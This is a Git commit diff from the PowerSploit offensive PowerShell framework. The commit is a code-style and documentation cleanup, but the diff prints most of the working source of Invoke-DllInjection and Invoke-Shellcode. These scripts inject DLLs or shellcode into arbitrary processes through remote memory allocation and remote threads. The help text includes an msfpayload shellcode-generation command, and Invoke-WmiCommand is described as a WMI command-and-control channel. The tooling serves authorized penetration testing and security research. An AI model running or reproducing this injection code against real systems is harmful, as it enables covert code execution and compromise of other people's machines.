Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

For ./CodeExecution/ : 

-PSScriptAnalyzering
    -Tweaking of synopsis blocks in order to support platyPS
    -Code standardization
    -Generated docs
This commit is contained in:
HarmJ0y 2016-12-14 17:50:37 -05:00
parent 7cdaa3c2d6
commit 1980f403ee
9 changed files with 3430 additions and 2621 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

60
CodeExecution/Invoke-DllInjection.ps1
View File

@ -5,15 +5,19 @@ function Invoke-DllInjection
Injects a Dll into the process ID of your choosing. Injects a Dll into the process ID of your choosing.
PowerSploit Function: Invoke-DllInjection PowerSploit Function: Invoke-DllInjection
Author: Matthew Graeber (@mattifestation) Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
Optional Dependencies: None Optional Dependencies: None
.DESCRIPTION .DESCRIPTION
Invoke-DllInjection injects a Dll into an arbitrary process. Invoke-DllInjection injects a Dll into an arbitrary process.
It does this by using VirtualAllocEx to allocate memory the size of the
DLL in the remote process, writing the names of the DLL to load into the
remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread
to invoke LoadLibraryA in the context of the remote process.
.PARAMETER ProcessID .PARAMETER ProcessID
@ -40,6 +44,8 @@ Use the '-Verbose' option to print detailed information.
http://www.exploit-monday.com http://www.exploit-monday.com
#> #>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[CmdletBinding()]
Param ( Param (
[Parameter( Position = 0, Mandatory = $True )] [Parameter( Position = 0, Mandatory = $True )]
[Int] [Int]
@ -59,7 +65,7 @@ http://www.exploit-monday.com
{ {
Throw "Process does not exist!" Throw "Process does not exist!"
} }
# Confirm that the path to the dll exists # Confirm that the path to the dll exists
try try
{ {
@ -79,11 +85,11 @@ http://www.exploit-monday.com
Param Param
( (
[OutputType([Type])] [OutputType([Type])]
[Parameter( Position = 0)] [Parameter( Position = 0)]
[Type[]] [Type[]]
$Parameters = (New-Object Type[](0)), $Parameters = (New-Object Type[](0)),
[Parameter( Position = 1 )] [Parameter( Position = 1 )]
[Type] [Type]
$ReturnType = [Void] $ReturnType = [Void]
@ -98,7 +104,7 @@ http://www.exploit-monday.com
$ConstructorBuilder.SetImplementationFlags('Runtime, Managed') $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
$MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
$MethodBuilder.SetImplementationFlags('Runtime, Managed') $MethodBuilder.SetImplementationFlags('Runtime, Managed')
Write-Output $TypeBuilder.CreateType() Write-Output $TypeBuilder.CreateType()
} }
@ -107,11 +113,11 @@ http://www.exploit-monday.com
Param Param
( (
[OutputType([IntPtr])] [OutputType([IntPtr])]
[Parameter( Position = 0, Mandatory = $True )] [Parameter( Position = 0, Mandatory = $True )]
[String] [String]
$Module, $Module,
[Parameter( Position = 1, Mandatory = $True )] [Parameter( Position = 1, Mandatory = $True )]
[String] [String]
$Procedure $Procedure
@ -128,7 +134,7 @@ http://www.exploit-monday.com
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr $tmpPtr = New-Object IntPtr
$HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
# Return the address of the function # Return the address of the function
Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
} }
@ -142,43 +148,43 @@ http://www.exploit-monday.com
[String] [String]
$Path $Path
) )
# Parse PE header to see if binary was compiled 32 or 64-bit # Parse PE header to see if binary was compiled 32 or 64-bit
$FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read) $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)
[Byte[]] $MZHeader = New-Object Byte[](2) [Byte[]] $MZHeader = New-Object Byte[](2)
$FileStream.Read($MZHeader,0,2) | Out-Null $FileStream.Read($MZHeader,0,2) | Out-Null
$Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader) $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
if ($Header -ne 'MZ') if ($Header -ne 'MZ')
{ {
$FileStream.Close() $FileStream.Close()
Throw 'Invalid PE header.' Throw 'Invalid PE header.'
} }
# Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header) # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header)
$FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null
[Byte[]] $lfanew = New-Object Byte[](4) [Byte[]] $lfanew = New-Object Byte[](4)
# Read offset to the PE Header (will be read in reverse) # Read offset to the PE Header (will be read in reverse)
$FileStream.Read($lfanew,0,4) | Out-Null $FileStream.Read($lfanew,0,4) | Out-Null
$PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join '')) $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join ''))
# Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE
$FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null
[Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2) [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2)
# Read compiled architecture # Read compiled architecture
$FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null
$Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '') $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '')
$FileStream.Close() $FileStream.Close()
if (($Architecture -ne '014C') -and ($Architecture -ne '8664')) if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))
{ {
Throw 'Invalid PE header or unsupported architecture.' Throw 'Invalid PE header or unsupported architecture.'
} }
if ($Architecture -eq '014C') if ($Architecture -eq '014C')
{ {
Write-Output 'X86' Write-Output 'X86'
@ -193,7 +199,7 @@ http://www.exploit-monday.com
} }
} }
# Get addresses of and declare delegates for essential Win32 functions. # Get addresses of and declare delegates for essential Win32 functions.
$OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
$OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
@ -307,7 +313,7 @@ http://www.exploit-monday.com
{ {
Throw "Unable to launch remote thread. NTSTATUS: 0x$($Result.ToString('X8'))" Throw "Unable to launch remote thread. NTSTATUS: 0x$($Result.ToString('X8'))"
} }
$VirtualFreeEx.Invoke($hProcess, $RemoteMemAddr, $Dll.Length, 0x8000) | Out-Null # MEM_RELEASE (0x8000) $VirtualFreeEx.Invoke($hProcess, $RemoteMemAddr, $Dll.Length, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
# Close process handle # Close process handle
@ -317,7 +323,7 @@ http://www.exploit-monday.com
# Extract just the filename from the provided path to the dll. # Extract just the filename from the provided path to the dll.
$FileName = (Split-Path $Dll -Leaf).ToLower() $FileName = (Split-Path $Dll -Leaf).ToLower()
$DllInfo = (Get-Process -Id $ProcessID).Modules | ? { $_.FileName.ToLower().Contains($FileName) } $DllInfo = (Get-Process -Id $ProcessID).Modules | Where-Object { $_.FileName.ToLower().Contains($FileName) }
if (!$DllInfo) if (!$DllInfo)
{ {

5037
CodeExecution/Invoke-ReflectivePEInjection.ps1
View File

File diff suppressed because it is too large Load Diff

131
CodeExecution/Invoke-Shellcode.ps1
View File

@ -5,22 +5,22 @@ function Invoke-Shellcode
Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
PowerSploit Function: Invoke-Shellcode PowerSploit Function: Invoke-Shellcode
Author: Matthew Graeber (@mattifestation) Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
Optional Dependencies: None Optional Dependencies: None
.DESCRIPTION .DESCRIPTION
Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre
PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk): PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):
msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary. Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary.
.PARAMETER ProcessID .PARAMETER ProcessID
Process ID of the process you want to inject shellcode into. Process ID of the process you want to inject shellcode into.
@ -35,7 +35,7 @@ Injects shellcode without prompting for confirmation. By default, Invoke-Shellco
.EXAMPLE .EXAMPLE
C:\PS> Invoke-Shellcode -ProcessId 4274 Invoke-Shellcode -ProcessId 4274
Description Description
----------- -----------
@ -43,7 +43,7 @@ Inject shellcode into process ID 4274.
.EXAMPLE .EXAMPLE
C:\PS> Invoke-Shellcode Invoke-Shellcode
Description Description
----------- -----------
@ -51,27 +51,32 @@ Inject shellcode into the running instance of PowerShell.
.EXAMPLE .EXAMPLE
C:\PS> Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)
Description Description
----------- -----------
Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET) Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET)
Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit! Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit!
#> #>
[CmdletBinding( DefaultParameterSetName = 'RunLocal', SupportsShouldProcess = $True , ConfirmImpact = 'High')] Param ( [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[ValidateNotNullOrEmpty()] [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
[UInt16] [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]
$ProcessID, [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[CmdletBinding( DefaultParameterSetName = 'RunLocal', ConfirmImpact = 'High')]
[Parameter( ParameterSetName = 'RunLocal' )] Param (
[ValidateNotNullOrEmpty()] [ValidateNotNullOrEmpty()]
[Byte[]] [UInt16]
$Shellcode, $ProcessID,
[Switch] [Parameter( ParameterSetName = 'RunLocal' )]
$Force = $False [ValidateNotNullOrEmpty()]
) [Byte[]]
$Shellcode,
[Switch]
$Force = $False
)
Set-StrictMode -Version 2.0 Set-StrictMode -Version 2.0
@ -81,17 +86,17 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
# This could have been validated via 'ValidateScript' but the error generated with Get-Process is more descriptive # This could have been validated via 'ValidateScript' but the error generated with Get-Process is more descriptive
Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null
} }
function Local:Get-DelegateType function Local:Get-DelegateType
{ {
Param Param
( (
[OutputType([Type])] [OutputType([Type])]
[Parameter( Position = 0)] [Parameter( Position = 0)]
[Type[]] [Type[]]
$Parameters = (New-Object Type[](0)), $Parameters = (New-Object Type[](0)),
[Parameter( Position = 1 )] [Parameter( Position = 1 )]
[Type] [Type]
$ReturnType = [Void] $ReturnType = [Void]
@ -106,7 +111,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
$ConstructorBuilder.SetImplementationFlags('Runtime, Managed') $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
$MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
$MethodBuilder.SetImplementationFlags('Runtime, Managed') $MethodBuilder.SetImplementationFlags('Runtime, Managed')
Write-Output $TypeBuilder.CreateType() Write-Output $TypeBuilder.CreateType()
} }
@ -115,11 +120,11 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
Param Param
( (
[OutputType([IntPtr])] [OutputType([IntPtr])]
[Parameter( Position = 0, Mandatory = $True )] [Parameter( Position = 0, Mandatory = $True )]
[String] [String]
$Module, $Module,
[Parameter( Position = 1, Mandatory = $True )] [Parameter( Position = 1, Mandatory = $True )]
[String] [String]
$Procedure $Procedure
@ -136,7 +141,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr $tmpPtr = New-Object IntPtr
$HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
# Return the address of the function # Return the address of the function
Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
} }
@ -151,12 +156,12 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
$LittleEndianByteArray = New-Object Byte[](0) $LittleEndianByteArray = New-Object Byte[](0)
$Address.ToString("X$($IntSizePtr*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } } $Address.ToString("X$($IntSizePtr*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } }
[System.Array]::Reverse($LittleEndianByteArray) [System.Array]::Reverse($LittleEndianByteArray)
Write-Output $LittleEndianByteArray Write-Output $LittleEndianByteArray
} }
$CallStub = New-Object Byte[](0) $CallStub = New-Object Byte[](0)
if ($IntSizePtr -eq 8) if ($IntSizePtr -eq 8)
{ {
[Byte[]] $CallStub = 0x48,0xB8 # MOV QWORD RAX, &shellcode [Byte[]] $CallStub = 0x48,0xB8 # MOV QWORD RAX, &shellcode
@ -177,7 +182,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
$CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread $CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread
$CallStub += 0xFF,0xD0 # CALL EAX $CallStub += 0xFF,0xD0 # CALL EAX
} }
Write-Output $CallStub Write-Output $CallStub
} }
@ -185,7 +190,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
{ {
# Open a handle to the process you want to inject into # Open a handle to the process you want to inject into
$hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF) $hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF)
if (!$hProcess) if (!$hProcess)
{ {
Throw "Unable to open a process handle for PID: $ProcessID" Throw "Unable to open a process handle for PID: $ProcessID"
@ -197,7 +202,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
{ {
# Determine if the process specified is 32 or 64 bit # Determine if the process specified is 32 or 64 bit
$IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null $IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null
if ((!$IsWow64) -and $PowerShell32bit) if ((!$IsWow64) -and $PowerShell32bit)
{ {
Throw 'Shellcode injection targeting a 64-bit process from 32-bit PowerShell is not supported. Use the 64-bit version of Powershell if you want this to work.' Throw 'Shellcode injection targeting a 64-bit process from 32-bit PowerShell is not supported. Use the 64-bit version of Powershell if you want this to work.'
@ -208,7 +213,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
{ {
Throw 'No shellcode was placed in the $Shellcode32 variable!' Throw 'No shellcode was placed in the $Shellcode32 variable!'
} }
$Shellcode = $Shellcode32 $Shellcode = $Shellcode32
Write-Verbose 'Injecting into a Wow64 process.' Write-Verbose 'Injecting into a Wow64 process.'
Write-Verbose 'Using 32-bit shellcode.' Write-Verbose 'Using 32-bit shellcode.'
@ -219,7 +224,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
{ {
Throw 'No shellcode was placed in the $Shellcode64 variable!' Throw 'No shellcode was placed in the $Shellcode64 variable!'
} }
$Shellcode = $Shellcode64 $Shellcode = $Shellcode64
Write-Verbose 'Using 64-bit shellcode.' Write-Verbose 'Using 64-bit shellcode.'
} }
@ -230,19 +235,19 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
{ {
Throw 'No shellcode was placed in the $Shellcode32 variable!' Throw 'No shellcode was placed in the $Shellcode32 variable!'
} }
$Shellcode = $Shellcode32 $Shellcode = $Shellcode32
Write-Verbose 'Using 32-bit shellcode.' Write-Verbose 'Using 32-bit shellcode.'
} }
# Reserve and commit enough memory in remote process to hold the shellcode # Reserve and commit enough memory in remote process to hold the shellcode
$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX) $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)
if (!$RemoteMemAddr) if (!$RemoteMemAddr)
{ {
Throw "Unable to allocate shellcode memory in PID: $ProcessID" Throw "Unable to allocate shellcode memory in PID: $ProcessID"
} }
Write-Verbose "Shellcode memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))" Write-Verbose "Shellcode memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))"
# Copy shellcode into the previously allocated memory # Copy shellcode into the previously allocated memory
@ -255,25 +260,25 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
{ {
# Build 32-bit inline assembly stub to call the shellcode upon creation of a remote thread. # Build 32-bit inline assembly stub to call the shellcode upon creation of a remote thread.
$CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32 $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32
Write-Verbose 'Emitting 32-bit assembly call stub.' Write-Verbose 'Emitting 32-bit assembly call stub.'
} }
else else
{ {
# Build 64-bit inline assembly stub to call the shellcode upon creation of a remote thread. # Build 64-bit inline assembly stub to call the shellcode upon creation of a remote thread.
$CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 64 $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 64
Write-Verbose 'Emitting 64-bit assembly call stub.' Write-Verbose 'Emitting 64-bit assembly call stub.'
} }
# Allocate inline assembly stub # Allocate inline assembly stub
$RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reserve|Commit, RWX) $RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reserve|Commit, RWX)
if (!$RemoteStubAddr) if (!$RemoteStubAddr)
{ {
Throw "Unable to allocate thread call stub memory in PID: $ProcessID" Throw "Unable to allocate thread call stub memory in PID: $ProcessID"
} }
Write-Verbose "Thread call stub memory reserved at 0x$($RemoteStubAddr.ToString("X$([IntPtr]::Size*2)"))" Write-Verbose "Thread call stub memory reserved at 0x$($RemoteStubAddr.ToString("X$([IntPtr]::Size*2)"))"
# Write 32-bit assembly stub to remote process memory space # Write 32-bit assembly stub to remote process memory space
@ -281,7 +286,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
# Execute shellcode as a remote thread # Execute shellcode as a remote thread
$ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero) $ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)
if (!$ThreadHandle) if (!$ThreadHandle)
{ {
Throw "Unable to launch remote thread in PID: $ProcessID" Throw "Unable to launch remote thread in PID: $ProcessID"
@ -301,7 +306,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
Throw 'No shellcode was placed in the $Shellcode32 variable!' Throw 'No shellcode was placed in the $Shellcode32 variable!'
return return
} }
$Shellcode = $Shellcode32 $Shellcode = $Shellcode32
Write-Verbose 'Using 32-bit shellcode.' Write-Verbose 'Using 32-bit shellcode.'
} }
@ -312,36 +317,36 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
Throw 'No shellcode was placed in the $Shellcode64 variable!' Throw 'No shellcode was placed in the $Shellcode64 variable!'
return return
} }
$Shellcode = $Shellcode64 $Shellcode = $Shellcode64
Write-Verbose 'Using 64-bit shellcode.' Write-Verbose 'Using 64-bit shellcode.'
} }
# Allocate RWX memory for the shellcode # Allocate RWX memory for the shellcode
$BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX) $BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)
if (!$BaseAddress) if (!$BaseAddress)
{ {
Throw "Unable to allocate shellcode memory in PID: $ProcessID" Throw "Unable to allocate shellcode memory in PID: $ProcessID"
} }
Write-Verbose "Shellcode memory reserved at 0x$($BaseAddress.ToString("X$([IntPtr]::Size*2)"))" Write-Verbose "Shellcode memory reserved at 0x$($BaseAddress.ToString("X$([IntPtr]::Size*2)"))"
# Copy shellcode to RWX buffer # Copy shellcode to RWX buffer
[System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $BaseAddress, $Shellcode.Length) [System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $BaseAddress, $Shellcode.Length)
# Get address of ExitThread function # Get address of ExitThread function
$ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread
if ($PowerShell32bit) if ($PowerShell32bit)
{ {
$CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 32 $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 32
Write-Verbose 'Emitting 32-bit assembly call stub.' Write-Verbose 'Emitting 32-bit assembly call stub.'
} }
else else
{ {
$CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64 $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64
Write-Verbose 'Emitting 64-bit assembly call stub.' Write-Verbose 'Emitting 64-bit assembly call stub.'
} }
@ -351,7 +356,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
{ {
Throw "Unable to allocate thread call stub." Throw "Unable to allocate thread call stub."
} }
Write-Verbose "Thread call stub memory reserved at 0x$($CallStubAddress.ToString("X$([IntPtr]::Size*2)"))" Write-Verbose "Thread call stub memory reserved at 0x$($CallStubAddress.ToString("X$([IntPtr]::Size*2)"))"
# Copy call stub to RWX buffer # Copy call stub to RWX buffer
@ -366,7 +371,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
# Wait for shellcode thread to terminate # Wait for shellcode thread to terminate
$WaitForSingleObject.Invoke($ThreadHandle, 0xFFFFFFFF) | Out-Null $WaitForSingleObject.Invoke($ThreadHandle, 0xFFFFFFFF) | Out-Null
$VirtualFree.Invoke($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000) $VirtualFree.Invoke($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
$VirtualFree.Invoke($BaseAddress, $Shellcode.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000) $VirtualFree.Invoke($BaseAddress, $Shellcode.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
@ -477,9 +482,9 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
$CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle
$CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool]) $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])
$CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate) $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)
Write-Verbose "Injecting shellcode into PID: $ProcessId" Write-Verbose "Injecting shellcode into PID: $ProcessId"
if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?', if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?',
"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) ) "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
{ {
@ -501,13 +506,13 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit
$WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
$WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int32]) ([Int]) $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int32]) ([Int])
$WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate) $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
Write-Verbose "Injecting shellcode into PowerShell" Write-Verbose "Injecting shellcode into PowerShell"
if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?', if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?',
"Injecting shellcode into the running PowerShell process!" ) ) "Injecting shellcode into the running PowerShell process!" ) )
{ {
Inject-LocalShellcode Inject-LocalShellcode
} }
} }
} }

11
CodeExecution/Invoke-WmiCommand.ps1
View File

@ -5,10 +5,10 @@ function Invoke-WmiCommand {
Executes a PowerShell ScriptBlock on a target computer using WMI as a Executes a PowerShell ScriptBlock on a target computer using WMI as a
pure C2 channel. pure C2 channel.
Author: Matthew Graeber Author: Matthew Graeber
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
Optional Dependencies: None Optional Dependencies: None
.DESCRIPTION .DESCRIPTION
@ -149,6 +149,9 @@ Write-Host in your scripts though, you probably don't deserve to get
the output of your payload back. :P the output of your payload back. :P
#> #>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')]
[CmdletBinding()] [CmdletBinding()]
Param ( Param (
[Parameter( Mandatory = $True )] [Parameter( Mandatory = $True )]

79
docs/CodeExecution/Invoke-DllInjection.md Executable file
View File

@ -0,0 +1,79 @@
# Invoke-DllInjection
## SYNOPSIS
Injects a Dll into the process ID of your choosing.
PowerSploit Function: Invoke-DllInjection
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
## SYNTAX
```
Invoke-DllInjection [-ProcessID] <Int32> [-Dll] <String>
```
## DESCRIPTION
Invoke-DllInjection injects a Dll into an arbitrary process.
It does this by using VirtualAllocEx to allocate memory the size of the
DLL in the remote process, writing the names of the DLL to load into the
remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread
to invoke LoadLibraryA in the context of the remote process.
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Invoke-DllInjection -ProcessID 4274 -Dll evil.dll
```
Description
-----------
